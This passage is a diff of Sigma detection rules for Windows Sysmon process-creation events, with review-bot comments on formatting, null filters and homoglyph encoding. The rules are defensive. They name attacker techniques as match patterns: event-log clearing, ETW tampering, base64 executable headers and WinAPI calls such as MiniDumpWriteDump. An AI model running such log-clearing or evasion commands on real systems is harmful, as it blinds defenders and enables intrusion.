+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml
@@ -1,8 +1,7 @@ title: Hidden Powershell in Link File Pattern id: 30e92f50-bb5a-4884-98b5-d20aa80f3d7a status: test -description: Detects events that appear when a user click on a link file with a powershell - command in it +description: Detects events that appear when a user click on a link file with a powershell command in it references: - https://www.x86matthew.com/view_post?id=embed_exe_lnk author: frack113
@@ -21,7 +20,7 @@ detection: selection: ParentImage: C:\Windows\explorer.exe Image: C:\Windows\System32\cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .lnk condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml
index 54e2c7058..9875556bf 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml
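Review bot: In `filter_main_parent_null` the explicit `ParentImage: null` is replaced by a bare `ParentImage:`; every YAML loader I know resolves both to null, so the filter should still match events where the field is absent, but the bare key now reads like an unfinished entry, especially next to `filter_main_parent_empty`, which keeps its explicit `''`. I would keep `ParentImage: null` so the intent stays visible to the next reader and is robust should any tooling ever distinguish an explicit null from a missing value. The same substitution appears in `filter_null` of proc_creation_win_susp_execution_from_guid_folder_names.yml (`Image:` for `Image: null`). The `detection` mapping this hunk edits starts before the hunk, which itself begins on the previous line.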
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml
@@ -1,9 +1,7 @@ title: ETW Logging Tamper In .NET Processes id: 41421f44-58f9-455d-838a-c398859841d4 status: test -description: Detects changes to environment variables related to ETW logging. This - could indicate potential adversaries stopping ETW providers recording loaded .NET - assemblies. +description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. references: - https://twitter.com/_xpn_/status/1268712093928378368 - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
@@ -30,7 +28,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - COMPlus_ETWEnabled - COMPlus_ETWFlags condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml
index 9c5dce15a..0f829b9ad 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml
@@ -1,8 +1,7 @@ title: Disable of ETW Trace id: a238b5d0-ce2d-4414-a676-7a531b3d13d6 status: test -description: Detects a command that clears or disables any ETW trace log which could - indicate a logging evasion. +description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil - https://abuse.io/lockergoga.txt
@@ -24,32 +23,32 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_clear_1: - CommandLine|contains|all: + CommandLine|contains|all: - cl - /Trace selection_clear_2: - CommandLine|contains|all: + CommandLine|contains|all: - clear-log - /Trace selection_disable_1: - CommandLine|contains|all: + CommandLine|contains|all: - sl - /e:false selection_disable_2: - CommandLine|contains|all: + CommandLine|contains|all: - set-log - /e:false - selection_disable_3: - CommandLine|contains|all: + selection_disable_3: # ETW provider removal from a trace session + CommandLine|contains|all: - logman - update - trace - --p - -ets - selection_pwsh_remove: - CommandLine|contains: Remove-EtwTraceProvider - selection_pwsh_set: - CommandLine|contains|all: + selection_pwsh_remove: # Autologger provider removal + CommandLine|contains: Remove-EtwTraceProvider + selection_pwsh_set: # Provider “Enable” property modification + CommandLine|contains|all: - Set-EtwTraceProvider - '0x11' condition: process_creation and (1 of selection*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml
index b2ddb3387..b0d262801 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml
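Review bot: The new comment on `selection_pwsh_set` uses typographic quotes (`# Provider “Enable” property modification`) while every other comment and string in these rule files is plain ASCII; an editor or pipeline that is not UTF-8 aware may mangle them, and they are easy to mistype when the line is edited later. I would write it as `selection_pwsh_set: # Provider "Enable" property modification`. The other two new comments in this hunk (`# ETW provider removal from a trace session`, `# Autologger provider removal`) read fine as written.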
@@ -1,9 +1,7 @@ title: Suspicious Eventlog Clear or Configuration Change id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 status: stable -description: Detects clearing or configuration of eventlogs using wevtutil, powershell - and wmic. Might be used by ransomwares during the attack (seen by NotPetya and - others). +description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
@@ -28,17 +26,17 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_wevtutil: Image|endswith: \wevtutil.exe - CommandLine|contains: - - 'clear-log ' - - ' cl ' - - 'set-log ' - - ' sl ' - - 'lfn:' + CommandLine|contains: + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' + - 'lfn:' # change log file location and name selection_other_ps: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - 'Clear-EventLog ' - 'Remove-EventLog ' - 'Limit-EventLog '
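Review bot: The comment added to the `'set-log '` entry of `selection_wevtutil` has a typo ("uset") and a lowercase sentence start; since these inline comments are the only explanation of the five wevtutil verbs the rule matches, they should read cleanly: `- 'set-log ' # modifies config of specified log. Could be used to set it to a tiny size`. The other four comments in the same list read fine.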
@@ -48,12 +46,15 @@ detection: - \powershell.exe - \pwsh.exe - \wmic.exe - CommandLine|contains: ClearEventLog + CommandLine|contains: ClearEventLog filter_msiexec: + # Example seen during office update/installation: + # ParentImage: C:\Windows\SysWOW64\msiexec.exe + # CommandLine: "C:\WINDOWS\system32\wevtutil.exe" sl Microsoft-RMS-MSIPC/Debug /q:true /e:true /l:4 /rt:false ParentImage: - C:\Windows\SysWOW64\msiexec.exe - C:\Windows\System32\msiexec.exe - CommandLine|contains: ' sl ' + CommandLine|contains: ' sl ' condition: process_creation and (1 of selection_* and not 1 of filter_*) falsepositives: - Admin activity
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml
index e2f4d425d..723065792 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml
@@ -1,16 +1,12 @@ title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf related: - - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f - type: derived + - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f + type: derived status: experimental -description: 'Detects execution of different log query utilities and commands to search - and dump the content of specific event logs or look for specific event IDs. - - This technique is used by threat actors in order to extract sensitive information - from events logs such as usernames, IP addresses, hostnames, etc. - - ' +description: | + Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. + This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ 
@@ -37,46 +33,52 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - Image|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - Image|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' selection_logs_name: - CommandLine|contains: + CommandLine|contains: + # Note: Add more event log channels that are interesting for attackers - Microsoft-Windows-TerminalServices-LocalSessionManager/Operational - Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational - Security selection_logs_eid: - CommandLine|contains: + CommandLine|contains: + # Note: We use the "?" to account for both a single and a double quote + # Note: Please add additional interesting event IDs + # Note: As this only focuses on EIDs and we know EIDs are not unique across providers. Rare FPs might occur with legit queries to EIDs from different providers. + # This covers EID 4624 from Security Log - -InstanceId 4624 - System[EventID=4624] - EventCode=?4624? - EventIdentifier=?4624? + # This covers EID 4778 from Security Log - -InstanceId 4778 - System[EventID=4778] - EventCode=?4778? - EventIdentifier=?4778? + # This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log - -InstanceId 25 - System[EventID=25] - EventCode=?25? - EventIdentifier=?25? 
- condition: process_creation and (1 of selection_logs_* and (selection_wmi or all - of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) + condition: process_creation and (1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) falsepositives: - Legitimate usage of the utility by administrators to query the event log level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml
index e1f8a640c..5a4173636 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml
@@ -1,8 +1,7 @@ title: Suspicious Execution From GUID Like Folder Names id: 90b63c33-2b97-4631-a011-ceb0f47b77c3 status: test -description: Detects potential suspicious execution of a GUID like folder name located - in a suspicious location such as %TEMP% as seen being used in IcedID attacks +description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks references: - https://twitter.com/Kostastsale/status/1565257924204986369 author: Nasreddine Bencherchali (Nextron Systems)
@@ -16,15 +15,20 @@ logsource: category: process_creation product: windows detection: + # Uncomment this section and remove the filter if you want the rule to be more specific to processes + # selection_img: + # Image|endswith: + # - '\rundll32.exe' process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_folder: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious or unexpected paths - \AppData\Roaming\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # This could generate some FP with some installers creating folders with GUID selection_guid: - CommandLine|contains|all: + CommandLine|contains|all: - \{ - '}\' filter:
@@ -32,12 +36,11 @@ detection: - \{ - '}\' filter_null: - Image: null - filter_driver_inst: + Image: + filter_driver_inst: # DrvInst.exe "4" "0" "C:\Users\venom\AppData\Local\Temp\{a0753cc2-fcea-4d49-a787-2290b564b06f}\nvvhci.inf" "9" "43a2fa8e7" "00000000000001C0" "WinSta0\Default" "00000000000001C4" "208" "c:\program files\nvidia corporation\installer2\nvvhci.{eb7b4460-7ec9-42d6-b73f-d487d4550526}" Image: C:\Windows\System32\drvinst.exe condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - - Installers are sometimes known for creating temporary folders with GUID like - names. Add appropriate filters accordingly + - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly level: medium ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml
index 84636b1e7..3a87c7199 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml
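Review bot: The new comment at the top of `detection` says to "remove the filter" when enabling `selection_img`, but this file has three filters (`filter`, `filter_null`, `filter_driver_inst`, the latter two visible in the second hunk), so it is not clear which one is meant; presumably the generic `filter` whose `\{` / `'}\'` items mirror `selection_guid`, and naming it removes the guesswork, e.g. `# Uncomment this section and remove the generic "filter" entry below if you want the rule to be more specific to processes`. In the second hunk the DrvInst sample is appended to the `filter_driver_inst:` key line itself, producing a roughly 300-character line; other rules in this commit (proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml, proc_creation_win_susp_eventlog_clear.yml) put such samples on their own `# Example:` lines above the key, and the same layout would be easier to read and diff here.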
@@ -1,8 +1,7 @@ title: Parent in Public Folder Suspicious Process id: 69bd9b97-2be2-41b6-9816-fb08757a4d1a status: test -description: This rule detects suspicious processes with parent images located in - the C:\Users\Public folder +description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems)
@@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|startswith: C:\Users\Public\ - CommandLine|contains: + CommandLine|contains: - powershell - 'cmd.exe /c ' - 'cmd.exe /r '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml
index b3225f1c9..c7f601878 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml
@@ -22,26 +22,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|contains: - - \$Recycle.bin\ - - \config\systemprofile\ - - \Intel\Logs\ - - \RSA\MachineKeys\ - - \Users\All Users\ - - \Users\Default\ - - \Users\NetworkService\ - - \Users\Public\ - - \Windows\addins\ - - \Windows\debug\ - - \Windows\Fonts\ - - \Windows\Help\ - - \Windows\IME\ - - \Windows\Media\ - - \Windows\repair\ - - \Windows\security\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - Image|startswith: C:\Perflogs\ + - Image|contains: + - \$Recycle.bin\ + - \config\systemprofile\ + - \Intel\Logs\ + - \RSA\MachineKeys\ + - \Users\All Users\ + - \Users\Default\ + - \Users\NetworkService\ + - \Users\Public\ + - \Windows\addins\ + - \Windows\debug\ + - \Windows\Fonts\ + - \Windows\Help\ + - \Windows\IME\ + - \Windows\Media\ + - \Windows\repair\ + - \Windows\security\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - Image|startswith: C:\Perflogs\ filter_ibm: Image|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\ filter_citrix:
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml
index 46da054ca..ab81e418c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml
@@ -1,8 +1,7 @@ title: Execution in Webserver Root Folder id: 35efb964-e6a5-47ad-bbcd-19661854018d status: test -description: Detects a suspicious program execution in a web service root folder (filter - out false positives) +description: Detects a suspicious program execution in a web service root folder (filter out false positives) author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2021/11/27
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml
index 5369724f1..999e856e3 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml
@@ -1,8 +1,7 @@ title: Suspicious File Characteristics Due to Missing Fields id: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43 status: test -description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company - likely created with py2exe +description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe references: - https://securelist.com/muddywater/88059/ - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection
@@ -31,8 +30,7 @@ detection: Company: \? folder: Image|contains: \Downloads\ - condition: process_creation and ((selection1 or selection2 or selection3) and - folder) + condition: process_creation and ((selection1 or selection2 or selection3) and folder) fields: - CommandLine - ParentCommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml
index 4fc4d7b74..b6fe41d61 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml
@@ -1,13 +1,12 @@ title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS id: 07aa184a-870d-413d-893a-157f317f6f58 related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 575dce0c-8139-4e30-9295-1ee75969f7fe - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
@@ -27,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs filter: Image|endswith: - \cscript.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml
index ef7e90419..f8cb0bfc6 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml
@@ -1,14 +1,11 @@ title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI id: 0900463c-b33b-49a8-be1d-552a3b553dae related: - - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 - type: similar + - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 + type: similar status: experimental -description: 'Detects command line containing reference to the "::$index_allocation" - stream, which can be used as a technique to prevent access to folders or files - from tooling such as "explorer.exe" or "powershell.exe" - - ' +description: | + Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" references: - https://twitter.com/pfiatde/status/1681977680688738305 - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/ @@ -29,7 +26,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ::$index_allocation + # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage + CommandLine|contains: ::$index_allocation condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml index 4c522ae76..81aa4a522 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml 
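Review bot: The added note that Sysmon and ETW cannot log the `::$index_allocation` string in CommandLine is only a YAML comment, so anyone consuming this rule through a rule viewer or converted output never sees it, even though this file is specifically the Sysmon EventID 1 variant whose `selection` depends on that very string. Consider carrying the limitation in the `description` block scalar as well, e.g. `Note: Sysmon/ETW process-creation events are not expected to contain this stream reference; validate against the EDR telemetry in use before relying on this rule`. The `condition`, `falsepositives` and `level` keys are unchanged, so the rule's stated confidence does not currently reflect that caveat.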
@@ -1,9 +1,7 @@ title: Writing Of Malicious Files To The Fonts Folder id: ae9b0bd7-8888-4606-b444-0ed7410cb728 status: test -description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ - location. This folder doesn't require admin privillege to be written and executed - from. +description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. references: - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ author: Sreeman @@ -23,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - echo - copy - type - file createnew - cacls selection_2: - CommandLine|contains: C:\Windows\Fonts\ + CommandLine|contains: C:\Windows\Fonts\ selection_3: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml index d3b0dfb9b..e45e4dbe2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml 
@@ -1,16 +1,10 @@ title: Potential Homoglyph Attack Using Lookalike Characters id: 32e280f1-8ad4-46ef-9e80-910657611fbc status: experimental -description: 'Detects the presence of unicode characters which are homoglyphs, or - identical in appearance, to ASCII letter characters. - - This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs - are included; these are characters that - - are indistinguishable from ASCII characters and thus may make excellent candidates - for homoglyph attack characters. - - ' +description: | + Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. + This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that + are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. references: - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish - http://www.irongeek.com/homoglyph-attack-generator.php @@ -20,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1036 - attack.t1036.003 + # - attack.t1036.008 - sysmon logsource: category: process_creation 
@@ -29,60 +24,59 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_upper: - CommandLine|contains: - - "\u0410" - - "\u0412" - - "\u0415" - - "\u041A" - - "\u041C" - - "\u041D" - - "\u041E" - - "\u0420" - - "\u0421" - - "\u0422" - - "\u0425" - - "\u0405" - - "\u0406" - - "\u0408" - - "\u04AE" - - "\u04C0" - - "\u050C" - - "\u051A" - - "\u051C" - - "\u0391" - - "\u0392" - - "\u0395" - - "\u0396" - - "\u0397" - - "\u0399" - - "\u039A" - - "\u039C" - - "\u039D" - - "\u039F" - - "\u03A1" - - "\u03A4" - - "\u03A5" - - "\u03A7" + CommandLine|contains: + - А # А/A + - В # В/B + - Е # Е/E + - К # К/K + - М # М/M + - Н # Н/H + - О # О/O + - Р # Р/P + - С # С/C + - Т # Т/T + - Х # Х/X + - Ѕ # Ѕ/S + - І # І/I + - Ј # Ј/J + - Ү # Ү/Y + - Ӏ # Ӏ/I + - Ԍ # Ԍ/G + - Ԛ # Ԛ/Q + - Ԝ # Ԝ/W + - Α # Α/A + - Β # Β/B + - Ε # Ε/E + - Ζ # Ζ/Z + - Η # Η/H + - Ι # Ι/I + - Κ # Κ/K + - Μ # Μ/M + - Ν # Ν/N + - Ο # Ο/O + - Ρ # Ρ/P + - Τ # Τ/T + - Υ # Υ/Y + - Χ # Χ/X selection_lower: - CommandLine|contains: - - "\u0430" - - "\u0435" - - "\u043E" - - "\u0440" - - "\u0441" - - "\u0445" - - "\u0455" - - "\u0456" - - "\u04CF" - - "\u0458" - - "\u04BB" - - "\u0501" - - "\u051B" - - "\u051D" - - "\u03BF" + CommandLine|contains: + - а # а/a + - е # е/e + - о # о/o + - р # р/p + - с # с/c + - х # х/x + - ѕ # ѕ/s + - і # і/i + - ӏ # ӏ/l + - ј # ј/j + - һ # һ/h + - ԁ # ԁ/d + - ԛ # ԛ/q + - ԝ # ԝ/w + - ο # ο/o condition: process_creation and (1 of selection_*) falsepositives: - - Commandlines with legitimate Cyrillic text; will likely require tuning (or not - be usable) in countries where these alphabets are in use. + - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml index ceef9a3be..025cfbf60 100644 
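Review bot: The new inline comments such as `# А/A` place the Cyrillic or Greek homoglyph next to its Latin twin, so in an editor both render as the same glyph and the comment conveys nothing the list entry did not already; the removed `"\u0410"` escapes at least carried the code point. Quoting the code point instead, e.g. `- А # U+0410 Cyrillic capital A (looks like Latin A)`, and doing the same for the rest of `selection_upper` and `selection_lower`, keeps the list reviewable and diffable. Because the entries are now raw non-ASCII literals rather than escapes, the rule also depends on the file being read as UTF-8; a mis-encoded copy would silently turn every entry into a non-matching string, which is worth a one-line note at the top of `selection_upper`.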
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml @@ -1,9 +1,7 @@ title: Execution Of Non-Existing File id: 71158e3f-df67-472b-930e-7d287acaa3e1 status: test -description: Checks whether the image specified in a process creation event is not - a full, absolute path (caused by process ghosting or other unorthodox methods - to start a process) +description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -22,21 +20,21 @@ detection: image_absolute_path: Image|contains: \ filter_null: - Image: null + Image: filter_empty: Image: - '-' - '' filter_4688: - - Image: - - System - - Registry - - MemCompression - - vmmem - - CommandLine: - - Registry - - MemCompression - - vmmem + - Image: + - System + - Registry + - MemCompression + - vmmem + - CommandLine: + - Registry + - MemCompression + - vmmem condition: process_creation and (not image_absolute_path and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml index 13dee2e12..9cbfd7d63 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml @@ -17,8 +17,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: - - TVqQAAMAAAAEAAAA + CommandLine|contains: + - TVqQAAMAAAAEAAAA # MZ.......... - TVpQAAIAAAAEAA8A - TVqAAAEAAAAEABAA - TVoAAAAAAAAAAAAA 
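Review bot: `filter_null` changes `Image: null` to `Image:` with an empty value, and the same edit appears in `filter_main_null` of the lolbin-non-C-drive and non-exe-image hunks (L3492, L3499). A YAML parser reads both forms as null, so the filter is unchanged in principle, but the bare key is easy to misread as an unfinished entry, and a rule loader that special-cases the literal `null` could stop treating it as a null check; I cannot confirm from this diff how the consuming tool handles it. Keeping the explicit form, or annotating the new one as `Image: # null: field absent`, makes the intent unambiguous for maintainers.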
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml index 21bf7c1ab..c5922125a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml @@ -1,11 +1,10 @@ title: Potential WinAPI Calls Via CommandLine id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 related: - - id: 03d83090-8cba-44a0-b02f-0b756a050306 - type: derived + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: derived status: test -description: Detects the use of WinAPI Functions via the commandline. As seen used - by threat actors via the tool winapiexec +description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec references: - https://twitter.com/m417z/status/1566674631788007425 author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - AddSecurityPackage - AdjustTokenPrivileges - Advapi32 @@ -49,6 +48,7 @@ detection: - LoadLibrary - memcpy - MiniDumpWriteDump + # - 'msvcrt' - ntdll - OpenDesktop - OpenProcess @@ -62,6 +62,7 @@ detection: - RtlCreateUserThread - secur32 - SetThreadToken + # - 'user32' - VirtualAlloc - VirtualFree - VirtualProtect @@ -71,7 +72,7 @@ detection: - ZeroFreeGlobalAllocUnicode filter_optional_mpcmdrun: Image|endswith: \MpCmdRun.exe - CommandLine|contains: GetLoadLibraryWAddress32 + CommandLine|contains: GetLoadLibraryWAddress32 condition: process_creation and (selection and not 